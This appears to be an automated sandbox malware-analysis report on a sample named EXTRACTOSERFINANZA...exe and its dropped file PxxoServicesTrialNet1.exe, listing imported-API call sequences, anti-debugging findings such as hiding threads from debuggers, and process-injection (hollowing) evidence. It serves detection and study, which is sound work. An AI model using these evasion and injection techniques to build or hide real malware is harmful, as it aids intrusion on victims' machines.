          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t25_2_00410586
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA25_2_0040477E
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00403325
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_00412BEE
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha7_2_00403C4A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread delayed: delay time: 922337203685477
          Source: WerFault.exe, 0000001F.00000002.759195897.00000000045BC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWU
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 0000000C.00000002.697391962.0000000004D30000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.758803849.0000000004490000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.771683997.0000000004E04000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 0000001F.00000002.759152587.0000000004590000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
          Source: WerFault.exe, 0000000C.00000002.697439836.0000000004F10000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.759315782.0000000004790000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014EBC60 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,014ECDB7,00000000,0000000015_2_014EBC60
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00409908
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,7_2_0040F219
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMemory written: unknown base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$